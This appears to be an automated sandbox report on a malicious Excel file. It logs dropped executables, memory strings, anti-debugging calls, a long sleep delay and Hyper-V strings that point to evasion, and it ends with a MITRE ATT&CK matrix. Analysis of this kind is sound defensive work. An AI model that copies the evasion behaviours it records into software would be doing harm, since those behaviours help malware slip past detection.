      Source: Binary string: Dw=helpvolumelabelmasteredudfUDFJOLIETItemPosItemOrder%s (%d).%sData\Program Files\Data\Windows\Program Files\Data\Program Files (x86)\Data\ProgramData\.cdxml.cer.automaticdestinations-ms.cat.dmp.cookie.customdestinations-msWindows\$Windows.~BT\Program Files (x86)\ProgramData\.appxbundle.appxpackageWindows.old\.appx.msip.msm.ocx.olb.mui.nst.etl.fon.dsft.efi.mpb.mp.partial.pdb.p7s.p7x.pfx.pem.pfm.p10.p12.ost.otf.p7m.p7r.p7b.p7c.sys.ttc.spkg.sst.vmrs.vsi.vmcx.psd1.psf.sft.spc.rll.wim.winmd.vsix.wfsWININET.xap\shellL source: fdcbn.exe, 00000001.00000002.253215972.00000236063F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504300437.000001DEF0E20000.00000002.00000001.sdmp
      Source: Binary string: ntdll.pdbUGP source: fdcbn.exe, 00000001.00000002.251576617.0000023605D80000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.501200537.000001DEF07C0000.00000002.00000001.sdmp
      Source: Binary string: ole32.pdbUGP source: fdcbn.exe, 00000001.00000002.258877953.0000023607860000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.508687761.000001DEF2290000.00000002.00000001.sdmp
      Source: Binary string: D:\projects\source\repos\7\dl7\Bin\x64\Release_nologs\qitx64.pdb(7 source: 9ght3erd[1].exe.0.dr
      Source: Binary string: ole32.pdb source: fdcbn.exe, 00000001.00000002.258877953.0000023607860000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.508687761.000001DEF2290000.00000002.00000001.sdmp
      Source: Binary string: advapi32.pdb source: fdcbn.exe, 00000001.00000002.251973477.0000023606110000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.503853339.000001DEF0D10000.00000002.00000001.sdmp
      Source: Binary string: shell32.pdb source: fdcbn.exe, 00000001.00000002.253215972.00000236063F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504300437.000001DEF0E20000.00000002.00000001.sdmp
      Source: Binary string: user32.pdb source: fdcbn.exe, 00000001.00000002.252447191.0000023606250000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.502621730.000001DEF0B30000.00000002.00000001.sdmp
      Source: Binary string: crypt32.pdbUGP source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp
      Source: Binary string: advapi32.pdbUGP source: fdcbn.exe, 00000001.00000002.251973477.0000023606110000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.503853339.000001DEF0D10000.00000002.00000001.sdmp
      Source: Binary string: dnsapi.pdb source: fdcbn.exe, 00000001.00000002.251864694.0000023606010000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.501906744.000001DEF0A50000.00000002.00000001.sdmp
      Source: Binary string: netapi32.pdb source: fdcbn.exe, 00000001.00000002.251960756.00000236060F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.502506717.000001DEF0B10000.00000002.00000001.sdmp
      Source: Binary string: ntdll.pdb source: fdcbn.exe, 00000001.00000002.251576617.0000023605D80000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.501200537.000001DEF07C0000.00000002.00000001.sdmp
      Source: Binary string: netapi32.pdbUGP source: fdcbn.exe, 00000001.00000002.251960756.00000236060F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.502506717.000001DEF0B10000.00000002.00000001.sdmp
      Source: Binary string: kernel32.pdb source: fdcbn.exe, 00000001.00000002.251787155.0000023605F60000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.501537228.000001DEF09A0000.00000002.00000001.sdmp
      Source: Binary string: user32.pdbUGP source: fdcbn.exe, 00000001.00000002.252447191.0000023606250000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.502621730.000001DEF0B30000.00000002.00000001.sdmp
      Source: Binary string: wininet.pdbUGP source: fdcbn.exe, 00000001.00000002.259081379.00000236079B0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.508856779.000001DEF23E0000.00000002.00000001.sdmp
      Source: Binary string: ws2_32.pdbUGP source: fdcbn.exe, 00000001.00000002.252045574.00000236061B0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504093786.000001DEF0DB0000.00000002.00000001.sdmp
      Source: Binary string: bcrypt.pdbUGP source: fdcbn.exe, 00000001.00000002.251361547.0000023605B70000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.499969051.000001DEEEC10000.00000002.00000001.sdmp
      Source: Binary string: shell32.pdbUGP source: fdcbn.exe, 00000001.00000002.253215972.00000236063F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504300437.000001DEF0E20000.00000002.00000001.sdmp
      Source: Binary string: crypt32.pdb source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645BD98E pushfq ; ret 1_2_00007FF7645BD992
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645BC349 pushfq ; ret 1_2_00007FF7645BC34A
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645BED4B pushfq ; ret 1_2_00007FF7645BED4F
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645B2318 pushfq ; ret 1_2_00007FF7645B231C
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645B452F pushfq ; ret 1_2_00007FF7645B4533
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645B3A07 pushfq ; ret 1_2_00007FF7645B3A0B
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645BE607 pushfq ; ret 1_2_00007FF7645BE60B
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645B23E1 pushfq ; ret 1_2_00007FF7645B23E5
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645BE1E1 pushfq ; ret 1_2_00007FF7645BE1E5
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645B4FBB pushfq ; ret 1_2_00007FF7645B4FBF
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645B21D0 pushfq ; ret 1_2_00007FF7645B21D4
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645B71D4 pushfq ; ret 1_2_00007FF7645B71D5
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645B3B97 pushfq ; ret 1_2_00007FF7645B3B9B
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645B219C pushfq ; ret 1_2_00007FF7645B21A0
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645BE47B pushfq ; ret 1_2_00007FF7645BE47F
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645BC68F pushfq ; ret 1_2_00007FF7645BC693
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645B705F pushfq ; ret 1_2_00007FF7645B7063
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645B4267 pushfq ; ret 1_2_00007FF7645B426B
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645BC44D pushfq ; ret 1_2_00007FF7645BC451
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645B7219 pushfq ; ret 1_2_00007FF7645B721D
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645BDA1E pushfq ; ret 1_2_00007FF7645BDA22
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645B242F pushfq ; ret 1_2_00007FF7645B2433
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645B20DE pushfq ; ret 1_2_00007FF7645B20E2
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645B6EC1 pushfq ; ret 1_2_00007FF7645B6EC5
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645B70BB pushfq ; ret 1_2_00007FF7645B70BF
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645B3CD1 pushfq ; ret 1_2_00007FF7645B3CD5
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645B3ACD pushfq ; ret 1_2_00007FF7645B3AD1
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645BDC9A pushfq ; ret 1_2_00007FF7645BDC9E
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645B4298 pushfq ; ret 1_2_00007FF7645B42A0
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645B26B0 pushfq ; ret 1_2_00007FF7645B26B4
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\msdownld.tmp\AS01A87F.tmp\victory.phpJump to dropped file
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\9ght3erd[1].exeJump to dropped file
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\30ght3erd[1].exeJump to dropped file
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\otrgh\sdgvjk\fdcbn.exeJump to dropped file
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\msdownld.tmp\AS01A87F.tmp\victory.phpJump to dropped file
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\otrgh\sdgvjk\fdcbn.exeThread delayed: delay time: 180000Jump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\9ght3erd[1].exeJump to dropped file
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEDropped PE file which has not been started: C:\otrgh\sdgvjk\fdcbn.exeJump to dropped file
      Source: C:\otrgh\sdgvjk\fdcbn.exeAPI coverage: 8.9 %
      Source: C:\otrgh\sdgvjk\fdcbn.exe TID: 5328Thread sleep time: -180000s >= -30000sJump to behavior
      Source: C:\otrgh\sdgvjk\fdcbn.exeLast function: Thread delayed
      Source: fdcbn.exe, 00000003.00000002.500144467.000001DEEEC82000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW0
      Source: fdcbn.exe, 00000003.00000003.358864794.000001DEEECE6000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF764607818 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF764607818
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645B8800 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,1_2_00007FF7645B8800
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF764603204 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FF764603204
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF764607818 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF764607818
      Source: C:\otrgh\sdgvjk\fdcbn.exeProcess created: C:\otrgh\sdgvjk\fdcbn.exe 'C:\otrgh\sdgvjk\fdcbn.exe' Jump to behavior
      Source: fdcbn.exe, 00000003.00000002.500567052.000001DEEF1D0000.00000002.00000001.sdmpBinary or memory string: Program Manager
      Source: fdcbn.exe, 00000001.00000002.252447191.0000023606250000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.502621730.000001DEF0B30000.00000002.00000001.sdmpBinary or memory string: GetProgmanWindow
      Source: fdcbn.exe, 00000003.00000002.500567052.000001DEEF1D0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: fdcbn.exe, 00000003.00000002.500567052.000001DEEF1D0000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: fdcbn.exe, 00000001.00000002.253215972.00000236063F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504300437.000001DEF0E20000.00000002.00000001.sdmpBinary or memory string: InitialExpandWindows.HistoryVaultRestoreWindows.closewindowWindows.menubarWindows.selectModeWindows.invertselectionWindows.selectnoneWindows.selectallWindows.pastelinkWindows.pasteWindows.includeinlibraryWindows.burnWindows.emailWindows.newfolderrenamerenamepastelinkpastelinkpropertiespropertieslinklinkpastepastecopycopycutcutdeletedeletemswindowsvideomswindowsmusicmailtohttpshttpbingmaps.zpl.xvid.WPL.wmv.wma.wm.wdp.wav.TTS.TS.rwl.rw2.raw.raf.png.pef.pdf.orf.nrw.nef.mts.mpv2.mpa.mp4v.mp4.mp3.mrw.mov.mod.mkv.m4v.m4r.m4a.m3u.m2ts.m2t.kdc.jxr.jpeg.jpe.jfif.html.htm.gif.flac.erf.epub.dib.crw.cr2.bmp.avi.arw.amr.adts.adt.aac.3gpp.3gp.3g2shcond://v2#ControlPanelExistsshcond://v1#AreAppDefaultsRestrictedshcond://v1#IsIrDASupportedshcond://v1#IsMobilityCenterEnabledshcond://v1#IsParentalControlsAvailableshcond://v1#IsProximityProviderAvailableshcond://v1#COMConditionshcond://v2#IsRemoteDesktopshcond://v2#IsProjectionAvailableshcond://v1#IsAuxDisplayConnectedAndAutoWakeEnabledshcond://v1#IsMuiEnabledshcond://v1#IsGlassOnshcond://v1#IsConnectedToInternetshcond://v1#IsTouchAvailableshcond://v1#IsPenAvailableshcond://v1#IsTabletPCshcond://v1#IsServershcond://v1#SkuEqualsshcond://v1#IsOfflineFilesEnabledshcond://v1#IsBrightnessAvailableshcond://v1#IsPresentationSettingsEnabledshcond://v1#IsMobilePCshcond://v1#IsAuxDisplayConnectedshcond://v1#IsUserAdminshcond://v1#IsMachineNotOnDomainAndDomainIsAvailshcond://v1#IsMachineOnDomainshcond://v1#RegkeyExistsshcond://v1#RegvalExistsshcond://v1#RegvalEqualsRateChartOverlayWindowAutoplayHandlerChooserOperationStatusWindowMenuSiteBaseBarExplorerBrowserControlExplorerBrowserNavigationDateRangeControlBooleanCheckMarkControlIconListControlmsctls_netaddressSysDragImageThumbnailControlPropertyControlBaseShell Preview Extension Temporary ParentShell Preview Extension Host PreviewerShell Preview Extension Host Background MsgCalendarHostDropDownRatingsControlSHELLDLL_MVPEditControlViewControlClassTrackContextMenuClassSharePointViewUserEventWindowGroupButtonShellFileSearchControlATL Shell EmbeddingDivWindowMSGlobalFolderOptionsStubProgmanStubWindow32cpShowColorcpColorWOACnslFontPreviewWOACnslWinPreview\Sharepoint\Dropbox\Google Drive\Onedrive -\3D Objects\Music\Videos\Pictures\Pictures\Camera Roll\Documents\Downloads\DesktopParse Internet Dont Escape SpacesDon't Parse RelativePendingRedirectionSyncRootsUserSyncRoots
      Source: fdcbn.exe, 00000001.00000002.253215972.00000236063F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504300437.000001DEF0E20000.00000002.00000001.sdmpBinary or memory string: VerticalScrollBaranimationTileContentsSrcanimationProgressSrcInneranimationProgressDstanimationProgressDstInneranimationTileContentsDstanimationTileContentsSrcInneranimationTileContentsDstInneranimationProgressSrcidOperationTileeltProgressBareltInterruptPaneeltSummaryeltRegularTileHeadereltInterruptDoForAlleltInterruptButtonsContainereltInterruptDescriptioneltItemIconeltInterruptSkipBtneltInterruptCancelBtneltInterruptRetryBtneltInterruptYesBtneltItemNameeltItemPropseltInterruptElevateBtneltInterruptDeleteBtneltInterruptDoForAllLabelidOperationInterruptidTileSubTextshell\shell32\operationstatusmgr.cppeltInterruptOKBtneltInterruptNoBtnConfirmationCheckBoxDoForAllidTileActionIdTileKeepDestIdTileKeepAsWorkIdTileKeepAsPersonalIdTileIgnoreIdTileDecideForEachidItemTileIdTileKeepSourceidTileIconeltConflictInterruptDescriptioneltItemTileContainerKeepSourceTileIconSkipTileIconDecideForEachTileIconCustomCommandIconidConflictInterrupteltInterruptTileHeaderidCustomConflictInterrupteltTimeRemainingeltTile%ueltTileContentseltPauseButtonIdTileDefault%0.2fCHARTVIEWeltRateCharteltCancelButtoneltRegularTileeltScrolleltDetailseltItemsRemainingeltLocationseltConfirmationInterrupteltConflictInterrupteltDisplayModeBtneltDisplayModeBtnFocusHoldereltTileAreaeltProgressBarContainereltDividereltScrollBarFilleridTileHosteltFooterAreaprogmanEnthusiastModeWindows.SystemToast.ExplorerRICHEDIT50WlfItaliclfUnderlinelfStrikeOutlfCharSetSoftware\Microsoft\NotepadlfEscapementlfOrientationlfWeightiPointSizeLucida ConsolelfFaceNamelfOutPrecisionlfClipPrecisionlfQualitylfPitchAndFamily
      Source: fdcbn.exe, 00000001.00000002.253215972.00000236063F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504300437.000001DEF0E20000.00000002.00000001.sdmpBinary or memory string: Local\SM0:%d:%d:%hsShell_TrayWnd_p0hCLSID\Software\Classes\RtlDllShutdownInProgressEtwEventWriteEtwEventEnabledEtwEventUnregisterEtwEventRegisterntdll.dllWilStaging_02NtQuerySystemInformationSecurity-SPP-Reserved-TBLProductKeyTypeshell32-license-ShowProductNameOnDesktopSoftware\Microsoft\Windows NT\CurrentVersion\WindowsDisplayVersionBasebrdWldpCheckRetailConfiguration\Registry\Machine\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\Certificates\2BD63D28D7BCD0E251195AEB519243C13142EBC3\Registry\Machine\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\2BD63D28D7BCD0E251195AEB519243C13142EBC3BuildLabYOr
      Source: fdcbn.exe, 00000003.00000002.504300437.000001DEF0E20000.00000002.00000001.sdmpBinary or memory string: PROGMANDDEMLMom%c:\%sExplorerDMGFrameGetWorkingDirGetDescriptionProgmanProgmanGetIconsetupPmFrameSoftware\Microsoft\Windows\CurrentVersion\Explorer\MapGroupsFoldersGroupsAppPropertiesBWWFrameccInsDDEBACKSCAPEDDEClientWndClassDDEClientStartUpddeClassInstallCA_DDECLASSMake Program Manager GroupMedia RecorderMediaRecorderSender#32770groups
      Source: fdcbn.exe, 00000003.00000002.500567052.000001DEEF1D0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
      Source: fdcbn.exe, 00000001.00000002.253215972.00000236063F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504300437.000001DEF0E20000.00000002.00000001.sdmpBinary or memory string: ConfirmCabinetIDExploreFolderShellFileOpenFindFileViewFolderCreateGroupReplaceItemDeleteItemFindFolderReloadAddItemShowGroupDeleteGroupExitProgman
      Source: fdcbn.exe, 00000001.00000002.253215972.00000236063F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504300437.000001DEF0E20000.00000002.00000001.sdmpBinary or memory string: CountryL1WUSF123r5.inidriverRestartCommandsSoftware\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup/LOADSAVEDWINDOWSNonRudeHWNDDesktopWindowAutoColorizationProgram ManagerpszDesktopTitleWLocal\Microsoft-Windows-DesktopBackground
      Source: fdcbn.exe, 00000001.00000002.252447191.0000023606250000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.502621730.000001DEF0B30000.00000002.00000001.sdmpBinary or memory string: SetProgmanWindow
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7646038CC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_00007FF7646038CC

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Replication Through Removable Media1Scripting11Path InterceptionProcess Injection12Masquerading11Input Capture11System Time Discovery1Replication Through Removable Media1Input Capture11Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsExploitation for Client Execution43Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySecurity Software Discovery21Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
